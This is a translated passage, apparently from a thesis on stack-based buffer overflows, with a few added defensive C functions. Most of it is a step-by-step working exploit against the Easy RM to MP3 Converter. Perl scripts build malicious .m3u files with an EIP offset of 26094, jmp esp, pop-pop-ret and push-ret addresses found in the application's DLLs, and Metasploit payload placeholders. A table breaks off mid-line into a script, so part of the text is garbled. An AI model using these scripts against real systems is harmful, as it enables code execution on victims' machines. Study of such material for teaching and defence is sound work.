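An added C example covering the strcpy/strncpy/strlcpy comparison above and the vulnerable do_something() of section 2.2.2 (my code, not the thesis's). strlcpy is a BSD function that not every libc ships, so the example carries a small function with the same semantics under the name bounded_copy (the name is my own), shows the strncpy case in which no terminator is written, and gives a hardened do_something() that rejects input that does not fit instead of overflowing MyVar.

```c
#include <stddef.h>
#include <string.h>

/* Added example. bounded_copy has strlcpy's contract: copy at most dst_size-1
 * bytes, always NUL-terminate when dst_size > 0, and return strlen(src) so the
 * caller can detect truncation by comparing the result with dst_size. */
size_t bounded_copy(char *dst, const char *src, size_t dst_size) {
    size_t src_len = strlen(src);
    if (dst_size == 0) return src_len;
    size_t n = src_len < dst_size - 1 ? src_len : dst_size - 1;
    memcpy(dst, src, n);
    dst[n] = '\0';
    return src_len;
}

/* The strncpy pitfall: when src has dst_size or more characters, strncpy fills
 * the whole destination and writes no terminator. Returns 1 if the destination is
 * left unterminated within its dst_size bytes, 0 if a NUL was written. */
int strncpy_leaves_unterminated(const char *src, size_t dst_size) {
    char dst[128];
    if (dst_size > sizeof dst) dst_size = sizeof dst;
    memset(dst, 'X', sizeof dst);          /* stands in for whatever follows the buffer */
    strncpy(dst, src, dst_size);
    return memchr(dst, '\0', dst_size) == NULL;
}

/* Hardened form of the thesis's do_something(): the copy is bounded by the size
 * of MyVar, and input that would have been truncated is treated as an error
 * (return -1) rather than processed. Returns 0 when the input fits. */
int do_something_safe(const char *Buffer) {
    char MyVar[128];
    if (bounded_copy(MyVar, Buffer, sizeof MyVar) >= sizeof MyVar)
        return -1;
    /* ... MyVar is a valid, terminated string here ... */
    return 0;
}

/* Demonstrations. bounded_copy of "abcdef" into 4 bytes keeps "abc" and reports 6. */
int bounded_copy_demo(void) {
    char buf[4];
    size_t needed = bounded_copy(buf, "abcdef", sizeof buf);
    return needed == 6 && strcmp(buf, "abc") == 0;
}

/* 200 'A's (the thesis's overflow input, shortened) are rejected by the hardened
 * function. Returns 1 if rejected. */
int long_input_rejected(void) {
    char input[201];
    memset(input, 'A', 200);
    input[200] = '\0';
    return do_something_safe(input) == -1;
}
```

Checking the return value of bounded_copy against the destination size is the step that turns truncation into a detectable condition; strlcpy has the same return contract, and the same check applies when it is available.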

Using some of the following constructs also causes buffer overflows:

DO NOT USE                                USE INSTEAD
char buf[1024]; if (size

my $file = "crash.m3u";
my $junk = "\x41" x 10000;
open($FILE, ">$file");
print $FILE $junk;
close($FILE);
print "m3u File Created successfully\n";

Running this script creates an m3u file filled with 10000 'A' characters (\x41 is the hex code of A); open it with Easy RM to MP3. The application shows a small error message, which appears to be handled correctly, and does not crash:

Figure 3.2: The application does not crash

Step 2: Change the script to 20000 A's and try again: still the same (the exception is handled correctly, and we still cannot read anything useful out of it). Now change it to 30000 A's and open the file with the application:

Figure 3.3: The application crashes

So the application crashes when the file contains between 20000 and 30000 A's. The application has a stack-based buffer overflow.

Conclusion: clearly, not every crashing application is exploitable. In many cases a crash will not lead to an exploit, but some bugs do. With an exploit, we make the application do something it was not designed to do, for example run a piece of our code. The simplest way to make an application do something different is to control its application flow. That can be done by controlling the Instruction Pointer (or Program Counter), the CPU register that holds a pointer to the next instruction to be executed.

Suppose the application calls a function with a parameter. Before entering the function, it saves the current location (usually known as the return address, used when the function ends). If you can change the value of this pointer so that it points to another place in memory that contains your code, you change the application's execution flow and make it execute something else (instead of returning to the original location). The code you want executed after taking control of this pointer is usually called shellcode. So if we can make the application run our shellcode, we can call it an exploit. In most cases this pointer is referenced by the EIP register, which is 4 bytes long. So if you can change these 4 bytes, you own the application and the computer it runs on.

3.2. EXPLOITATION STEPS

In this section we mainly study the steps for exploiting a stack-based buffer overflow. There are usually 5 steps to exploiting this kind of software security vulnerability. Each step is detailed below.

3.2.1. Attaching the program to a debugger[13]

To see the state of the stack (and the values of registers such as the stack pointer and instruction pointer) we need to attach a debugger to the application, so that we can see what happens while the application runs (and especially when it dies). There are many debuggers for this purpose, among them Windbg and Immunity Debugger.

We now continue with the example from the section on finding stack-based buffer overflows. Run Easy RM to MP3 and open the file crash.m3u again. The application will crash again, and this time the debugger will start.

Figure 3.4: The Windbg interface

Figure 3.5: The Immunity Debugger interface

Both interfaces give nearly the same information, differing only in presentation. In the Immunity interface, at the top left, you can see the CPU view, showing the assembly code. The window is empty, and the current EIP points to 41414141, an invalid address (AAAA). At the top right you see the registers. At the bottom right is the content of the stack.

So it looks like part of the m3u file was read into a buffer and caused a buffer overflow. We overflowed the buffer and overwrote the instruction pointer, so we can control the EIP register. Our file contains only A's, so we do not know exactly how large the buffer must be to overwrite EIP precisely. In other words, if we want to overwrite EIP (to make it jump to our code), we must know the exact position in the buffer/payload where the return address will be written. This position is usually called the offset.

3.2.2. Determining exactly where EIP sits in the buffer

The purpose of this step is to determine exactly where EIP is stored on the stack. We continue analysing the example above to show how this step is done.

We know that EIP sits somewhere between bytes 20000 and 30000 of the buffer. You could now overwrite the entire memory space between bytes 20000 and 30000 with the address you want in EIP. That would work, but it is better to find the exact position to write to. To determine the exact offset of EIP in the buffer, some additional work is needed.

First, we narrow the range by changing the contents of the Perl script. We create a file with 25000 A's and 5000 B's. If EIP contains 41414141, EIP lies between 20000 and 25000; if EIP contains 42424242, it lies between 25000 and 30000.

my $file = "crash25000.m3u";
my $junk = "\x41" x 25000;
my $junk2 = "\x42" x 5000;
open($FILE, ">$file");
print $FILE $junk.$junk2;
close($FILE);
print "m3u File Created successfully\n";

Create the file and open crash25000.m3u with Easy RM to MP3.

Figure 3.6: EIP contains 42424242 (BBBB)

EIP contains 42424242 (BBBB), so we know that EIP lies between 25000 and 30000.

Figure 3.7: Contents of the buffer after Easy RM to MP3 runs

Figure 3.8: Contents of ESP

We overwrote EIP with BBBB and can see the buffer in ESP. We still need to find the exact position in the buffer that overwrites EIP. To do that, we use Metasploit.

Metasploit is a good tool for calculating the offset. It generates strings made of unique patterns. Using such a pattern, together with the value of EIP after the pattern has been used in the m3u file, we can see how far into the buffer the bytes that overwrite EIP sit.

Open the tools directory of Metasploit Framework 3. There you will find a script called pattern_create.rb. Create a pattern of 5000 characters and write it to a file:

root@bt:/pentest/exploits/framework/tools# ./pattern_create.rb 5000

Change our Perl script and replace $junk2 with those 5000 characters:

my $file = "crash25000.m3u";
my $junk = "\x41" x 25000;
my $junk2 = "put the 5000 characters here";
open($FILE, ">$file");
print $FILE $junk.$junk2;
close($FILE);
print "m3u File Created successfully\n";

Create the .m3u file, open it with Easy RM to MP3, wait for the application to die and note the contents of EIP:

Figure 3.9: Contents of EIP after the application crashes

This time EIP contains the value 0x356b4234. Now we use the second Metasploit tool to calculate the exact length of the buffer before EIP is overwritten, from the EIP value and the length of the pattern:

root@bt:/pentest/exploits/framework3/tools# ./pattern_offset.rb 0x356b4234 5000
1094

The command outputs 1094, the buffer length needed to reach EIP. So if you create a file with 25000+1094 A's followed by 4 B's (42424242), EIP will contain 42424242.
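The pattern-offset calculation of this step (and of the 1000-character pattern used later in section 3.3.6), as an added C example that is not code from the thesis or from Metasploit; it reproduces the pattern layout of pattern_create.rb (Aa0Aa1Aa2...) and uses the register values quoted in this chapter. During crash triage this is how you turn a register value from a crash dump into the position in the input that overwrote it, and so confirm that an overflow actually reaches the saved return address.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Cyclic pattern in the layout used by Metasploit's pattern_create.rb:
 * every 3-byte group is <upper><lower><digit>, counting up from "Aa0", so
 * any 4-byte window is unique within the first 20280 bytes.
 * Writes at most n bytes into out (which needs n + 1 bytes), NUL-terminates,
 * and returns the number of pattern bytes written. */
size_t pattern_create(char *out, size_t n)
{
    size_t pos = 0;
    for (char u = 'A'; u <= 'Z'; u++) {
        for (char l = 'a'; l <= 'z'; l++) {
            for (char d = '0'; d <= '9'; d++) {
                const char group[3] = { u, l, d };
                for (int i = 0; i < 3; i++) {
                    if (pos == n) {
                        out[pos] = '\0';
                        return pos;
                    }
                    out[pos++] = group[i];
                }
            }
        }
    }
    out[pos] = '\0';
    return pos;   /* reached only when n exceeds the pattern period */
}

/* eip is the 32-bit value the debugger shows in the register after the
 * crash. x86 is little-endian, so the 4 input bytes that landed in EIP are
 * searched for in reversed order (the same byte order pack("V", ...) in the
 * Perl scripts produces). Returns the offset of those bytes in the pattern,
 * or -1 if the register value did not come from the pattern at all. */
long pattern_offset(const char *pattern, size_t n, uint32_t eip)
{
    unsigned char needle[4];
    for (int i = 0; i < 4; i++)
        needle[i] = (unsigned char)(eip >> (8 * i));
    for (size_t i = 0; i + 4 <= n; i++)
        if (memcmp(pattern + i, needle, 4) == 0)
            return (long)i;
    return -1;
}

/* Convenience wrapper: build an n-byte pattern and look eip up in it. */
long offset_for(size_t n, uint32_t eip)
{
    char *pat = malloc(n + 1);
    if (pat == NULL)
        return -1;
    size_t len = pattern_create(pat, n);
    long off = pattern_offset(pat, len, eip);
    free(pat);
    return off;
}

int main(void)
{
    /* The register values quoted in this chapter: 0x356b4234 seen with a
     * 5000-byte pattern (section 3.2.2) and the bytes "5Ai6" seen with a
     * 1000-byte pattern (section 3.3.6). */
    printf("0x356b4234 in a 5000-byte pattern -> offset %ld\n",
           offset_for(5000, 0x356b4234u));
    printf("\"5Ai6\" (0x36694135) in a 1000-byte pattern -> offset %ld\n",
           offset_for(1000, 0x36694135u));
    printf("0x41414141 (AAAA) -> %ld, i.e. not taken from the pattern\n",
           offset_for(1000, 0x41414141u));
    return 0;
}
```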
We know that EIP points to a location in the buffer, so we add some C's after overwriting EIP. We change the script to create a new m3u file:

my $file = "eipcrash.m3u";
my $junk = "A" x 26094;
my $eip = "BBBB";
my $espdata = "C" x 1000;
open($FILE, ">$file");
print $FILE $junk.$eip.$espdata;
close($FILE);
print "m3u File Created successfully\n";

Create eipcrash.m3u, open it with Easy RM to MP3, and note the contents of ESP:

Figure 3.10: EIP holds the value BBBB

Figure 3.11: ESP holds the address 000ff730

EIP now contains BBBB, which is exactly what we need: we control EIP. On top of that, ESP points to our buffer (the C's). Our exploit buffer will look like this:

Figure 3.12: Contents of the exploit buffer

3.2.3. Finding memory space to store the shellcode

We control EIP; now we want to point it somewhere that holds our code (the shellcode). But where in this space can we put the shellcode, and how do we make EIP jump to it? We continue with the example above to clarify this.

To crash the application, we wrote 26094 A's into memory, put a new value into EIP, and wrote a series of C's. When the application crashes, look at the registers and dump them (with the commands d esp, d eax, d ebx); you will see our buffer (consisting only of A's and C's). You can then replace them with shellcode and jump to that location. In our example, ESP points to the C's (use d esp to see), so the idea is to put the shellcode in the C's and make EIP point there.

Although we see C's, we do not know whether the one at 000ff730 is the first C placed in the buffer. To find out, we change the Perl script to use the following pattern string in place of the C's. Here 144 characters are used (you can use more or fewer):

my $file = "test1.m3u";
my $junk = "A" x 26094;
my $eip = "BBBB";
my $shellcode = "1ABCDEFGHIJK2ABCDEFGHIJK3ABCDEFGHIJK4ABCDEFGHIJK" .
                "5ABCDEFGHIJK6ABCDEFGHIJK" .
                "7ABCDEFGHIJK8ABCDEFGHIJK" .
                "9ABCDEFGHIJKAABCDEFGHIJK" .
                "BABCDEFGHIJKCABCDEFGHIJK";
open($FILE, ">$file");
print $FILE $junk.$eip.$shellcode;
close($FILE);
print "m3u File Created successfully\n";

Create and open the file, then look at ESP:

Figure 3.13: ESP starts at the 5th character

You will notice two interesting things: ESP starts at the 5th character of our pattern, not the first; and at the end of the pattern you see A's, but these A's belong to the beginning of the buffer (the 26101 A's), so you could also put shellcode at the start of the buffer.

We add 4 characters before the pattern and check again. ESP should now point to the first character of the pattern:

my $file = "test1.m3u";
my $junk = "A" x 26094;
my $eip = "BBBB";
my $preshellcode = "XXXX";
my $shellcode = "1ABCDEFGHIJK2ABCDEFGHIJK3ABCDEFGHIJK4ABCDEFGHIJK" .
                "5ABCDEFGHIJK6ABCDEFGHIJK" .
                "7ABCDEFGHIJK8ABCDEFGHIJK" .
                "9ABCDEFGHIJKAABCDEFGHIJK" .
                "BABCDEFGHIJKCABCDEFGHIJK";
open($FILE, ">$file");
print $FILE $junk.$eip.$preshellcode.$shellcode;
close($FILE);
print "m3u File Created successfully\n";

The application crashes again; look at ESP once more:

Figure 3.14: ESP points to the first character of the pattern

We now have: control of EIP; a region where we can place shellcode (144 bytes, and in fact much more); and a register pointing directly to our code, at address 0x000ff730.

We still need: a real shellcode; and a way to make EIP jump to the address where the shellcode starts. That could be done by writing the address 0x000ff730 into EIP.

Let us try the simple case first. Overwrite EIP with 000ff730, followed by 25 NOPs[14] (\x90), a break (\xcc), and 25 more NOPs. If this works, EIP jumps to 0x000ff730 and runs the NOPs until it hits the break.

my $file = "test1.m3u";
my $junk = "A" x 26094;
my $eip = pack("V", 0x000ff730);
my $shellcode = "\x90" x 25;
$shellcode = $shellcode . "\xcc";
$shellcode = $shellcode . "\x90" x 25;
open($FILE, ">$file");
print $FILE $junk.$eip.$shellcode;
close($FILE);
print "m3u File Created successfully\n";

The application crashes. Looking at EIP, it points to 0x000ff730. But when we dump ESP, we do not see what we expected.

Figure 3.15: EIP contains 000ff730

Jumping to an address directly is not a good method (000ff730 contains a null byte, the string terminator). Besides, using a fixed address as a jump target is unreliable: it depends on the operating system and language. So how do we jump to the shellcode reliably? That is shown in the next step.

3.2.4. Jumping to the shellcode reliably

We placed the buffer exactly at the point ESP points to; in other words, ESP points to the start of the shellcode. If that were not the case, we would have to look at the contents of the other pointers and hope to find the buffer. In this example we use ESP.

Jumping to ESP is a very common technique in Windows applications. A Windows application uses one or more dll files, and these dlls contain a lot of code. Moreover, the addresses used by a dll are static. So if we can find a dll containing an instruction that jumps to esp, we can overwrite EIP with the address of that instruction.

First we need to find the opcodes[15] for jmp esp. You can do that by opening Easy RM to MP3, then opening windbg and attaching (hooking) it to Easy RM to MP3. Do not do anything with Easy RM to MP3; this lets windbg show which modules and dlls Easy RM to MP3 has loaded.

Figure 3.16: Attaching windbg to Easy RM to MP3

When the debugger attaches, the application breaks. In the windbg command line, type a (assemble) and press Enter. Then type jmp esp and press Enter. Then type u (unassemble) followed by the address that was displayed before you typed jmp esp.

Figure 3.17: ffe4 is the opcode of jmp esp

At 7c90120e you can see ff e4. That is the opcode for jmp esp.

Now we look for this opcode in the loaded dlls:

ModLoad: 774e0000 7761d000 C:\WINDOWS\system32\ole32.dll
ModLoad: 10000000 10071000 C:\Program Files\Easy RM to MP3 Converter\MSRMfilter03.dll
ModLoad: 71ab0000 71ac7000 C:\WINDOWS\system32\WS2_32.dll
ModLoad: 71aa0000 71aa8000 C:\WINDOWS\system32\WS2HELP.dll
ModLoad: 00ce0000 00d7f000 C:\Program Files\Easy RM to MP3 Converter\MSRMfilter01.dll
ModLoad: 01a90000 01b01000 C:\Program Files\Easy RM to MP3 Converter\MSRMCcodec00.dll
ModLoad: 00c80000 00c87000 C:\Program Files\Easy RM to MP3 Converter\MSRMCcodec01.dll
ModLoad: 01b10000 01fdd000 C:\Program Files\Easy RM to MP3 Converter\MSRMCcodec02.dll
ModLoad: 01fe0000 01ff1000 C:\WINDOWS\system32\MSVCIRT.dll
ModLoad: 77120000 771ab000 C:\WINDOWS\system32\OLEAUT32.dll

If we find the opcode in one of the application's dlls, there is a good chance the exploit works on any Windows version. If we find it in a dll that belongs to the operating system, the exploit will only work on that version of the operating system. So we work with the Easy RM to MP3 dlls first.

We look at C:\Program Files\Easy RM to MP3 Converter\MSRMCcodec02.dll. This dll is loaded between 01b10000 and 01fdd000. Search it for ff e4. When choosing an address, watch out for NULL BYTES: you should avoid addresses containing a null byte, because that byte terminates the string and the data after it cannot be used.

Another way to search for the opcode is:

s 70000000 l fffffff ff e4

There are several ways to find opcode addresses: Findjmp (Ryan Permeh): compile findjmp.c and run it with parameters; the Metasploit opcode database; Memdump; Pvefindaddr, a plugin for Immunity Debugger.

Because we want to put the shellcode at ESP (which EIP will later point to), the jmp esp address must not contain a null byte. We take the first address: 0x01ccf23a. Check that the address holds jmp esp:

Figure 3.18: The jmp esp opcode in the dll file

If you overwrite EIP with 0x01ccf23a, jmp esp will be executed. ESP holds the shellcode, so we have a way to exploit the bug. Let us test it with the NOP-break code. Close windbg and create an m3u file with the following script:

my $file = "test1.m3u";
my $junk = "A" x 26094;
my $eip = pack("V", 0x01ccf23a);
my $shellcode = "\x90" x 25;
$shellcode = $shellcode . "\xcc";
$shellcode = $shellcode . "\x90" x 25;
open($FILE, ">$file");
print $FILE $junk.$eip.$shellcode;
close($FILE);
print "m3u File Created successfully\n";

The result:

Figure 3.19: Result of the test with the NOP-break code

Run the application again, attach windbg, press g to continue, and open the m3u file with the application. The application breaks at 000ff745, which means jmp esp worked (it started at 000ff730, ran through the NOPs up to 000ff744, and hit the break). All that remains is to put in a real shellcode.

There are many techniques for jumping to the shellcode; they are covered in more detail in section 3.3. Which one to use depends on the specific case.

3.2.5. Getting the shellcode and finishing the exploit

This is the last step of the exploitation process: choosing a suitable shellcode. Metasploit provides many payloads[16] for building exploits. Payloads have various options, depending on what we need, and can be very small or very large. If the buffer is limited, you can use multi-staged shellcode, or hand-written shellcode (32-byte cmd.exe shellcode for XP SP2 EN). You can also split the shellcode into parts called eggs and use the egg-hunting technique to reassemble the shellcode.

The Perl script becomes:

my $file = "exploitrmtomp3.m3u";
my $junk = "A" x 26094;
my $eip = pack("V", 0x01ccf23a);
my $shellcode = "\x90" x 25;
# windows/exec 144 bytes
# http://www.metasploit.com
# Encoder: x86/shikata_ga_nai
# EXITFUNC=seh, CMD=calc
# The 144 encoded payload bytes that were appended to $shellcode here are omitted from this transcript.
open($FILE, ">$file");
print $FILE $junk.$eip.$shellcode;
close($FILE);
print "m3u File Created successfully\n";

First, turn off autopopup in the registry. Create the m3u file and open it with the application: we have our first exploit.

Figure 3.20: Successful exploitation

3.3. TECHNIQUES FOR JUMPING TO THE SHELLCODE

Jumping to the shellcode is the most important part of exploiting a software bug; it decides whether the exploitation of the vulnerability succeeds. There are many ways to jump to the shellcode, and the appropriate one is chosen case by case. In this section we go through the ways of jumping to the shellcode one by one.

3.3.1. jump (or call)

Jump (or call) a register that points directly to the shellcode. With this technique, you basically use a register that contains the address of the shellcode and get that address into EIP. You look for the opcode of a jump or call to that register in the dll files of the running application. When you build the payload, instead of overwriting EIP with an address in memory, you overwrite it with the address of the jump-to-register instruction. Of course, this only works when the register contains an address pointing to the shellcode.
That is the method we used in the section above.

If a register contains an address pointing directly to the shellcode, you can use call [reg] or jump directly to the shellcode. In other words, if ESP points directly to the shellcode (so the first byte of the shellcode is the first byte at ESP), you can overwrite EIP with the address of a call esp instruction and the shellcode will be executed. This works with every register, and the kernel32.dll library contains many addresses holding call [reg].

Example: suppose ESP points directly to the shellcode. First find an opcode containing call esp. We use findjmp:

findjmp.exe kernel32.dll esp
Findjmp, Eeye, I2S-LaB
Findjmp2, Hat-Squad
Scanning kernel32.dll for code useable with the esp register
0x7C836A08 call esp
0x7C874413 jmp esp
Finished Scanning kernel32.dll for code useable with the esp register
Found 2 usable addresses

Next we overwrite EIP with the address 0x7C836A08. In the earlier Easy RM to MP3 example we learned that ESP can be pointed at the shellcode by adding 4 characters between EIP and ESP, so the exploit looks like this:

my $file = "test1.m3u";
my $junk = "A" x 26094;
my $eip = pack("V", 0x7C836A08);
my $prependesp = "XXXX";
my $shellcode = "\x90" x 25;
# windows/exec 303 bytes
# http://www.metasploit.com
# Encoder: x86/alpha_upper
# EXITFUNC=seh, CMD=calc
# The 303 encoded payload bytes that were appended to $shellcode here are omitted from this transcript.
open($FILE, ">$file");
print $FILE $junk.$eip.$prependesp.$shellcode;
close($FILE);
print "m3u File Created successfully\n";

3.3.2. pop return

If no register points directly to the shellcode, but you can see an address on the stack (the first, the second, ...) that points to the shellcode, you can load that address into EIP with pop ret[17] if it is the first, pop pop ret if it is the second, or pop pop pop pop ret and so on, depending on its position on the stack.

In the Easy RM to MP3 example we could easily get ESP to point directly to the shellcode. But what if no register points to the shellcode? Well, in that case the address pointing to the shellcode may lie on the stack. If you dump esp, look at the first addresses. If one of these addresses points to the shellcode (or to a buffer you control), you can find a pop ret or pop pop ret to: take the address off the stack; and jump to the address it takes you to, the shellcode.

The pop ret technique only works when ESP+offset contains an address pointing to the shellcode. So when you dump ESP and one of the first addresses points to the shellcode, put a reference to pop ret (or pop pop ret) in EIP. That discards some addresses from the stack (one address per pop) and puts the next address into EIP. If that one points to the shellcode, you succeed.

The second case for pop ret: you control EIP, no register points to the shellcode, but your shellcode can be found at ESP+8. In that case you can put pop pop ret in EIP, and it will jump to ESP+8.

Let us build a test. We have 26094 bytes before EIP is overwritten, and we need 4 bytes before reaching the location ESP points to (in my case 0x000ff730). We simulate that ESP+8 holds an address pointing to the shellcode (in reality we will put the shellcode right after it; this is only a test): 26094 A's, then XXXX (which ends where ESP points), a break, 7 NOPs, a break, and many more NOPs. Suppose the shellcode starts at the second break. The goal is to jump from the first break to the second one, at ESP+8 = 0x000ff738.

my $file = "test1.m3u";
my $junk = "A" x 26094;
my $eip = "BBBB";
my $prependesp = "XXXX";
my $shellcode = "\xcc";
$shellcode = $shellcode . "\x90" x 7;
$shellcode = $shellcode . "\xcc";
$shellcode = $shellcode . "\x90" x 500;
open($FILE, ">$file");
print $FILE $junk.$eip.$prependesp.$shellcode;
close($FILE);
print "m3u File Created successfully\n";

Looking at the stack, the application crashed because of the buffer overflow. EIP was overwritten with BBBB. ESP points to 000ff730, which begins with the first break, followed by 7 NOPs, and then we see the second break, where the shellcode really begins (at address 0x000ff738).

The goal is to get the value at ESP+8 into EIP and make it jump to the shellcode. We use the pop ret technique together with the address of jmp esp to do that. One pop instruction takes 4 bytes off the stack, after which ESP points to 000ff734. Another pop takes 4 more bytes, and ESP points to 000ff738. When the ret instruction executes, the value at the address ESP currently points to is put into EIP. So if the value at 000ff738 is the address of a jmp esp instruction, that is what EIP will execute. The buffer after 000ff738 contains our shellcode.

We need to find pop, pop, ret somewhere and overwrite EIP with the address of the first instruction of that sequence. And we have to set ESP+8 to hold the address of jmp esp, followed by our shellcode.

First we need the opcodes of pop pop ret. We use the assemble function in windbg:

0:000> a
7c90120e pop eax
pop eax
7c90120f pop ebp
pop ebp
7c901210 ret
ret
7c901211
0:000> u 7c90120e
ntdll!DbgBreakPoint:
7c90120e 58              pop     eax
7c90120f 5d              pop     ebp
7c901210 c3              ret
7c901211 ffcc            dec     esp
7c901213 c3              ret
7c901214 8bff            mov     edi,edi
7c901216 8b442404        mov     eax,dword ptr [esp+4]
7c90121a cc              int     3

So pop pop ret has the opcodes 0x58, 0x5d, 0xc3. Of course, other opcodes can be used, for example the following:

Figure 3.21: Some opcodes

Now we have to find this opcode sequence in the available dlls. In part one we discussed application dlls versus operating system dlls. I recommend using the application's dlls, because that increases reliability and avoids depending on the Windows version. But you must make sure the dll uses the same addresses every time; sometimes a dll is rebased, and in that case it is better to use an OS dll such as user32.dll or kernel32.dll.

Open Easy RM to MP3 (without opening any file) and attach windbg to the running process. Windbg lists the loaded modules, both OS modules and application modules (look for lines starting with ModLoad). Here are a few of the application's dlls:

ModLoad: 00ce0000 00d7f000 C:\Program Files\Easy RM to MP3 Converter\MSRMfilter01.dll
ModLoad: 01a90000 01b01000 C:\Program Files\Easy RM to MP3 Converter\MSRMCcodec00.dll
ModLoad: 00c80000 00c87000 C:\Program Files\Easy RM to MP3 Converter\MSRMCcodec01.dll
ModLoad: 01b10000 01fdd000 C:\Program Files\Easy RM to MP3 Converter\MSRMCcodec02.dll

You should avoid addresses containing null bytes, since they make the exploit harder. Searching MSRMCcodec00.dll gives a few results:

0:014> s 01a90000 l 01b01000 58 5d c3
01ab6a10  58 5d c3 33 c0 5d c3 55-8b ec 51 51 dd 45 08 dc  X].3.].U..QQ.E..
01ab8da3  58 5d c3 8d 4d 08 83 65-08 00 51 6a 00 ff 35 6c  X]..M..e..Qj..5l
01ab9d69  58 5d c3 6a 02 eb f9 6a-04 eb f5 b8 00 02 00 00  X].jj..

Now we can jump to ESP+8. At that location we need to place an address pointing to jmp esp (as said, after the RET the address is taken and put into EIP; at that moment ESP points to our shellcode, which lies right after the jmp esp address).

In part one we found that 0x01ccf23a points to jmp esp. Going back to our Perl script, we replace the BBBB that overwrites EIP with the address of pop, pop, ret, followed by 8 bytes of NOP (simulating ESP+8), then the address of jmp esp, and then the shellcode. The buffer looks like this:

[AAAAAAAAAAAAA][0x01ab6a10][NOPNOPNOPNOPNOPNOPNOPNOP][0x01ccf23a][Shellcode]
   26094 As   EIP(=POPPOPRET)     8 bytes offset         JMP ESP

The exploit proceeds as follows:
EIP is overwritten with the address of POP POP RET; ESP points to the first byte of the 8-byte offset.
POP POP RET executes. EIP takes the address 0x01ccf23a found at ESP+8; ESP now points to the shellcode.
EIP holds the address of jmp esp; the second jump is taken and the shellcode runs.

Figure 3.22: EIP overwritten with the address of jmp esp

We simulate this with a break and some NOPs as the shellcode, so we can see whether the jumps work.

my $file = "test1.m3u";
my $junk = "A" x 26094;
my $eip = pack("V", 0x01ab6a10);
my $jmpesp = pack("V", 0x01ccf23a);
my $prependesp = "XXXX";
my $shellcode = "\x90" x 8;
$shellcode = $shellcode . $jmpesp;
$shellcode = $shellcode . "\xcc" . "\x90" x 500;
open($FILE, ">$file");
print $FILE $junk.$eip.$prependesp.$shellcode;
close($FILE);
print "m3u File Created successfully\n";

It works; now replace the NOPs after jmp esp (ESP+8) with real shellcode.

3.3.3. Push return

This method is slightly different from call-to-register: if you cannot find a call register or jump register opcode, you can push the address onto the stack and then ret. So you look for a push register followed by ret, find an address that executes this sequence, and overwrite EIP with that address.

push ret is similar to call [reg]. If a register points directly to your shellcode and for some reason you cannot use jmp [reg] to jump to it, you can: put the address held in the register onto the stack, where it will sit at the top; then ret (take that address from the stack and jump to it). To do this, overwrite EIP with the address of a push [reg] ret sequence in a dll.

Suppose ESP points directly to the shellcode; you need to find the push esp opcode followed by the ret opcode:

0:000> a
000ff7ae push esp
push esp
000ff7af ret
ret
0:000> u 000ff7ae
+0xff79d:
000ff7ae 54              push    esp
000ff7af c3              ret

The opcode sequence is 0x54, 0xc3. Search for this opcode sequence:

Figure 3.23: The opcode sequence 0x54, 0xc3

Create an exploit and run it:

my $file = "test1.m3u";
my $junk = "A" x 26094;
my $eip = pack("V", 0x01aa57f6);
my $prependesp = "XXXX";
my $shellcode = "\x90" x 25;
# windows/exec 303 bytes
# http://www.metasploit.com
# Encoder: x86/alpha_upper
# EXITFUNC=seh, CMD=calc
# The 303 encoded payload bytes that were appended to $shellcode here are omitted from this transcript.
open($FILE, ">$file");
print $FILE $junk.$eip.$prependesp.$shellcode;
close($FILE);
print "m3u File Created successfully\n";

3.3.4. jmp [reg + offset]

If a register points into the stack area holding the shellcode, but not directly to the start of the shellcode, you can also try to find an instruction in the OS or application dlls that adds the required number of bytes to the register and then jumps. I call this the jmp [reg + offset] method.

Another technique for dealing with shellcode that starts at an offset from the register (ESP in the example) is to look for a jmp [reg + offset] instruction and overwrite EIP with the address of that instruction. Suppose we need to jump 8 bytes (as in the previous example); the jmp reg+offset technique lets us jump 8 bytes directly to the shellcode. We need three things: find the opcode of jmp [esp+8h]; find an address holding this instruction; overwrite EIP with that address.

Use windbg to find the opcode:

0:014> a
7c90120e jmp [esp + 8]
jmp [esp + 8]
7c901212
0:014> u 7c90120e
ntdll!DbgBreakPoint:
7c90120e ff642408        jmp     dword ptr [esp+8]

The opcode is ff642408. Now search the dlls for this opcode and use its address to overwrite EIP. However, I could not find this opcode anywhere. Of course, the search does not have to be limited to esp+8; it could be more than 8, in which case we add some NOPs to compensate.

3.3.5. blind return

In the previous sections ESP pointed to the current top of the stack. A RET instruction pops the last value (4 bytes) off the stack and puts that address into EIP. So if you overwrite EIP with an address that executes a RET instruction, you get the address at ESP into EIP. If you face a case where the space available in the buffer after EIP is limited, but there is plenty of space before ESP, you can use a jump in the small part of the buffer to jump back to the beginning of the buffer, where the main shellcode sits.

The technique has 2 steps: overwrite EIP with an address pointing to a RET instruction; and know the address held in the first 4 bytes at ESP. When RET executes, it takes these 4 bytes (now at the top of the stack) and writes them into EIP, and the exploit jumps to the shellcode.

This technique works when: you cannot point EIP to a register (because no jump or call instruction can be found); and you control ESP. To carry it out, you need the memory address of the shellcode (a stack address). Usually, to avoid null bytes, you place the shellcode after EIP; if the shellcode is at a location without null bytes, it can work. Find the address of a RET instruction in the dlls, set the first 4 bytes at ESP to point to where the shellcode starts, and overwrite EIP with the address of the RET instruction.
Remember that in part 1, ESP pointed to 0x000ff730. Naturally this address changes from one operating system to another, but there is no alternative to hardcoding it. The buffer looks like this:

[26094 As][address of ret][0x000ff730][shellcode]

3.3.6. Dealing with small buffers (jumping anywhere with custom jumpcode)

We have discussed how to make EIP jump to our shellcode. So far we have been free to put the shellcode in the buffer (in the part after EIP). But what if there is not enough room to put the shellcode there?

In the example we used 26094 A's to overwrite EIP, and we saw that ESP points 26094+4 bytes in, with plenty of space before it. But what if we only had 50 bytes after it? 50 bytes is not enough to hold the shellcode. So we have to look around and use the 26094 bytes that trigger the buffer overflow.

First we need to find where these 26094 bytes are in memory. If we cannot find them anywhere, they are hard to reference. If they are found in memory and some register points to them, it becomes very easy.

Testing Easy RM to MP3, you can see that the 26094 bytes are visible in the ESP dump:

my $file = "test1.m3u";
my $junk = "A" x 26094;
my $eip = "BBBB";
my $preshellcode = "X" x 54;
my $nop = "\x90" x 230;
open($FILE, ">$file");
print $FILE $junk.$eip.$preshellcode.$nop;
close($FILE);
print "m3u File Created successfully\n";

